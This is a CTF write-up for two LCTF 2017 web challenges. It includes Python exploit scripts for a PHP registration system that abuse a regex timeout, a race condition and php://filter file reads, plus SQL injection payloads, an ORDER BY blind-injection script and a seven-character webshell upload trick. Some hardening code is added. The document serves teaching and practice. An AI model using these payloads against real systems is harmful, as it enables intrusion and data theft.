LCTF-2017-WEB-WP (continuously updated)

Source: Internet
Author: User

"1" Meng Meng Registration System

Challenge hint: the registration system was developed with an IDE, something like PhpStorm; scan it a bit with your tools.

We find a leaked .idea directory; viewing the source of .idea/workspace.xml reveals Xdcms2333.zip.

Download and extract the source code. Here are the key pieces of code I located:

```php
// register.php
$sth = $pdo->prepare('INSERT INTO users (username, password) VALUES (:username, :password)');
$sth->execute([':username' => $username, ':password' => $password]);
// the user row is already committed before the code is checked
// (pattern reconstructed as (?:###|\w)* from the garbled source)
preg_match('/^(xdsec)((?:###|\w)*)$/i', $code, $matches);
if (count($matches) === 3 && $admin === $matches[0]) {
    $sth = $pdo->prepare('INSERT INTO identities (username, identity) VALUES (:username, :identity)');
    $sth->execute([':username' => $username, ':identity' => $matches[1]]);
} else {
    $sth = $pdo->prepare('INSERT INTO identities (username, identity) VALUES (:username, "GUEST")');
    $sth->execute([':username' => $username]);
}
```


```php
// login.php
$sth = $pdo->prepare('SELECT password FROM users WHERE username = :username');
$sth->execute([':username' => $username]);
if ($sth->fetch()[0] !== $password) {
    die('wrong password');
}
$_SESSION['username'] = $username;
unset($_SESSION['is_logined']);
unset($_SESSION['is_guest']);
```


```php
// member.php
if (isset($_SESSION['username']) === false) {
    die('please login first');
}
$sth = $pdo->prepare('SELECT identity FROM identities WHERE username = :username');
$sth->execute([':username' => $_SESSION['username']]);
// fetch() returns false when there is no row, so [0] is null and the test below fails
if ($sth->fetch()[0] === 'GUEST') {
    $_SESSION['is_guest'] = true;
}
$_SESSION['is_logined'] = true;
if (isset($_SESSION['is_logined']) === false || isset($_SESSION['is_guest']) === true) {
    // guest branch (body not preserved in the source)
} else {
    if (isset($_GET['file']) === false)
        echo "None";
    elseif (is_file($_GET['file']))
        echo "You cannot give me a file";
    else
        readfile($_GET['file']);
}
```

It is easy to see that the username/password check is separate from the identity check, and that the identity check in member.php only does anything if the query actually returns a row. Since the check is

$sth->fetch()[0] === 'GUEST'

a user with no row in identities is not marked as a guest, so the check can be bypassed without the query ever succeeding.

The key to the intended solution is

preg_match('/^(xdsec)((?:###|\w)*)$/i', $code, $matches);

preg_match does a greedy match here, so we can feed it an extremely long string to chew on, making preg_match consume a lot of resources until PHP times out; the PHP statements after it are then never executed, so the users row exists but no identities row is written. This bypasses the first layer.

The second layer, the is_file check, can be bypassed with a PHP stream wrapper (pseudo-protocol), after which config.php in the same directory can be read to get the flag. Here is my own Python script:

```python
# coding: utf-8
# author: ur10ser
import requests

url = 'http://123.206.120.239/'
log = 'login.php'
reg = 'register.php'
s = requests.session()
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 "
                  "(KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
    "Content-Type": "application/x-www-form-urlencoded",
}
# registration: the oversized 'code' keeps preg_match busy until PHP times out,
# so the users row is written but the identities row never is
data = {
    'to': 'reg',
    'do': '0',
    'username': 'ur10ser',
    'password': 'ur10ser',
    'code': 'xdsec###' + 'AAA' * 50000,
}
data1 = {
    'to': 'log',
    'username': 'ur10ser',
    'password': 'ur10ser',
}
url1 = url + reg
url2 = url + log
s.post(url1, headers=headers, data=data)
print('[+] registration successful!')
s.post(url2, data=data1)
print('[+] login successful!')
# php://filter is not a regular file, so is_file() is false and readfile() runs
r = s.get('http://123.206.120.239/member.php?file=php://filter/resource=config.php')
print(r.text)
```

Run results

Next, the unintended solution to this problem: a race condition.

Because the check is

if ($sth->fetch()[0] === 'GUEST')

if there is no row for this username in the identities table yet, $sth->fetch()[0] evaluates to null, which also passes the first layer. So you can register users from multiple Python threads and, in the window before

$sth = $pdo->prepare('INSERT INTO identities (username, identity) VALUES (:username, :identity)');

is executed, the first layer is bypassed.
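As an added example that is not part of the challenge source or the original writeup, here is how the two weaknesses discussed above, the missing identities row after preg_match is cut short and the fail-open GUEST comparison, could be closed: both INSERTs run in one transaction, a preg_match error is treated as a failed registration, and member.php denies access unless a non-guest row is actually found. It assumes $pdo is a PDO handle configured with ERRMODE_EXCEPTION and that a 64-byte limit on the code is an acceptable policy.

```php
<?php
// Added example, not the challenge's or the writeup's own code: hardened
// register.php / member.php logic. Assumes $pdo is a PDO handle with
// ERRMODE_EXCEPTION; the 64-byte length limit is an assumed policy value.

function registerUser(PDO $pdo, string $username, string $password, string $code, string $admin): bool
{
    // Bound the untrusted input before it reaches the regex, so an oversized
    // string is rejected outright instead of being handed to preg_match.
    if (strlen($code) > 64) {
        return false;
    }
    // Pattern as reconstructed from the challenge snippet above.
    $result = preg_match('/^(xdsec)((?:###|\w)*)$/i', $code, $matches);
    // preg_match returns false (not 0) when PCRE gives up, e.g. on
    // pcre.backtrack_limit; treat that as an error, never as "guest".
    if ($result === false) {
        return false;
    }
    $identity = ($result === 1 && $admin === $matches[0]) ? $matches[1] : 'GUEST';

    // Both rows are written in one transaction: there is no moment at which
    // the users row exists without its identities row, so a concurrent
    // login + member.php request cannot observe a half-registered user.
    $pdo->beginTransaction();
    try {
        $sth = $pdo->prepare('INSERT INTO users (username, password) VALUES (:username, :password)');
        $sth->execute([':username' => $username, ':password' => $password]);
        $sth = $pdo->prepare('INSERT INTO identities (username, identity) VALUES (:username, :identity)');
        $sth->execute([':username' => $username, ':identity' => $identity]);
        $pdo->commit();
    } catch (PDOException $e) {
        $pdo->rollBack();
        return false;
    }
    return true;
}

// Fail closed: a missing identities row and a GUEST row both mean "not a member".
function isPrivilegedMember(PDO $pdo, string $username): bool
{
    $sth = $pdo->prepare('SELECT identity FROM identities WHERE username = :username');
    $sth->execute([':username' => $username]);
    $row = $sth->fetch(PDO::FETCH_NUM);
    if ($row === false || $row[0] === null) {
        return false;   // no row: deny, where the original null !== 'GUEST' let the request through
    }
    return $row[0] !== 'GUEST';
}
```

Password storage is left as in the challenge; hashing it is a separate fix that would also change login.php.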

Below is Au1ge's race-condition script:

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import re
import uuid
import threading

url = "http://123.206.120.239/register.php"
url1 = "http://123.206.120.239/login.php"
url2 = "http://123.206.120.239/index.php"
url3 = "http://123.206.120.239/member.php?file=php://filter/resource=config.php"
username = ""
session = ""
proxies = {'http': 'http://127.0.0.1:8080'}


def sess():
    # obtain a fresh PHPSESSID from the login page
    r = requests.get(url1)
    m = re.search('PHPSESSID=(.*?);', r.headers['Set-Cookie'])
    if m:
        return str(m.group(1))


def regist():
    # keep registering the current username with an oversized code
    global username, session
    while True:
        data = {'to': 'reg', 'username': username, 'password': '1',
                'code': 'xdsec' + '##' * 5000}
        cookie = {'PHPSESSID': session}
        requests.post(url, data=data, cookies=cookie, stream=True)


def login():
    # keep logging in; "None" in the response means member.php was reached
    global username, session
    while True:
        data1 = {'username': username, 'password': '1', 'to': 'log'}
        cookie1 = {'PHPSESSID': session}
        r1 = requests.post(url1, data=data1, cookies=cookie1)
        content = r1.text
        if 'None' in content:
            print(content)
            print("login:" + username + '-' + session)
            # print(r1.text)
            # return
            username = str(uuid.uuid4())[:16]
            session = sess()


def read():
    # keep requesting member.php with the php://filter payload
    global username, session
    while True:
        cookie2 = {'PHPSESSID': session}
        r = requests.get(url3, cookies=cookie2)
        if 'php' in r.text:
            print(r.text)
            username = str(uuid.uuid4())[:16]
            session = sess()


username = str(uuid.uuid4())[:16]
session = sess()


def main():
    threadpool = []
    for n in range(10):
        th = threading.Thread(target=login)
        th.daemon = True
        threadpool.append(th)
    for n in range(10):
        th = threading.Thread(target=regist)
        th.daemon = True
        threadpool.append(th)
    for n in range(10):
        th = threading.Thread(target=read)
        th.daemon = True
        threadpool.append(th)
    for th in threadpool:
        th.start()
    for th in threadpool:
        th.join()


if __name__ == '__main__':
    main()
```

Reflection: at first I built the super long string in Burp Suite to feed to preg_match, and Burp managed not to freeze. Later a master used Burp's Intruder instead. The specific steps are:

1. Burp Suite Intruder: repeatedly POST to login.php (the login action)
2. Burp Suite Intruder: repeatedly GET member.php
3. With both of the above running, register the account

The cookie must be the same for all three actions, and the username and password in steps 1 and 3 must match, so that while the registration is still in progress the login completes and the request to member.php passes the identity check and reaches the file-reading code. That code can then be given

?file=./x/../config.php

to read any file.
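As an added example, not from the challenge or the writeup, here is a replacement for the readfile branch of member.php that defeats both the php://filter wrapper trick described earlier and the ./x/../config.php traversal above: the requested name is resolved inside one fixed directory and anything that does not resolve to a regular file there is refused. The /var/www/html/public base directory is an assumption.

```php
<?php
// Added example, not the challenge's own code. Serves files only from one
// fixed directory; the base path is an assumption for this example.
const PUBLIC_DIR = '/var/www/html/public';

function resolvePublicFile(string $requested): ?string
{
    // Stream wrappers (php://filter, data:, ...) never name a local file,
    // and a NUL byte would truncate the path at the filesystem layer.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $requested) === 1
        || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath(PUBLIC_DIR);
    $path = realpath(PUBLIC_DIR . DIRECTORY_SEPARATOR . $requested);
    // realpath() collapses ./x/../ sequences; anything that lands outside the
    // base directory (config.php, /etc/passwd, ...) or does not exist is rejected.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // Only regular files are served (the challenge's is_file() check was inverted).
    return is_file($path) ? $path : null;
}

$path = resolvePublicFile($_GET['file'] ?? '');
if ($path === null) {
    http_response_code(404);
    echo 'None';
} else {
    readfile($path);
}
```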

"2" What's their secret?

Doing this problem showed how rigid my thinking is; I feel I usually learn things too mechanically and don't know how to extrapolate.

Challenge hints:

1. entrance.php
2. there is no need to scan and brute force!
3. hacking for fun!

Testing entrance.php shows it has SQL injection, but keywords such as schema, information and column are filtered, so the author clearly did not intend for you to dump the table and column names that way.

The database name is easy to get. Error-based injection is the obvious next idea; referring to https://dev.mysql.com/doc/refman/5.5/en/func-op-summary-ref.html, fuzzing turned up

multipolygon(id), multilinestring(id), linestring(id), geometrycollection(id), multipoint(id), polygon(id)

All of these can be used for error-based injection, but after testing each one only linestring(id) turned out to work here. We can use it to extract the table name by submitting pro_id=1 and linestring(pro_id)

Then find a way to get the column names of PRODUCT_2017CTF:

pro_id=1 union select * from (select * from PRODUCT_2017CTF as a join PRODUCT_2017CTF as b using (pro_name)) as c

This gives the next column, pro_name; continue with the error:

pro_id=0 and (select * from YOUCANNEVERFINDME17.PRODUCT_2017CTF a join YOUCANNEVERFINDME17.PRODUCT_2017CTF b using (pro_id,pro_name)) c)

Continuing gives owner, and finally d067a0fa9dc61a6e.

The column name d067a0fa9dc61a6e is filtered here, so there are two ways to read it.

"1" To select the content without naming the column, union a virtual table with the real one. Payload:

pro_id=-1 union select 1,a.4,3,4 from (select 1,2,3,4 from dual union select * from PRODUCT_2017CTF) a limit 3,1;

"2" Use ORDER BY blind injection. Here I quote P Bull's script; the details of ORDER BY blind injection can be looked up on Baidu.

```python
# -*- coding: utf8 -*-
__author__ = '[email protected]'
import requests
import time


def foo():
    url = r'http://182.254.246.93/entrance.php'
    mys = requests.session()
    # ORDER BY blind: the guessed prefix goes into the 4th union column,
    # and the sort order reveals how it compares to the real value
    x = "3 union distinct select 1,2,3,0x%s ORDER BY 4 desc"
    # printable ASCII, equivalent to string.maketrans('', '')[33:127] in Python 2
    cset = ''.join(chr(c) for c in range(33, 127))
    pwd = ''
    while True:
        try:
            for i in cset:
                myd = {'pro_id': x % (pwd + i).encode().hex()}
                res = mys.post(url, data=myd).text
                if 'nextentrance' not in res:
                    pwd += chr(ord(i) - 1)
                    print(pwd)
                    break
            time.sleep(0.01)
        except Exception:
            print('__')
            time.sleep(0.5)


if __name__ == '__main__':
    foo()
    print('OK')
```

With the tip, we got the address of the next stage.

The content turns out to be limited to 7 characters, and it is not a simple front-end limit.

Filename    Content
bash        random
bb          a 7-character command
z.php       <?=`*`;

The <?=`*`; in z.php is exactly seven characters: when z.php is accessed, `*` expands to every file in the current directory in alphabetical order and the resulting string is executed as a command. Once the three files above are uploaded, the folder contains four files, sorted alphabetically as

bash bb index.html (the original page) z.php

so accessing z.php is equivalent to executing bash bb index.html z.php.

The content of bb is the command to run: ls / and then cat /3*, respectively.

Actually you can get a shell this way, but I had not thought of such a simple method. Youdao's analysis of the original problem is very clear: http://www.vuln.cn/6016
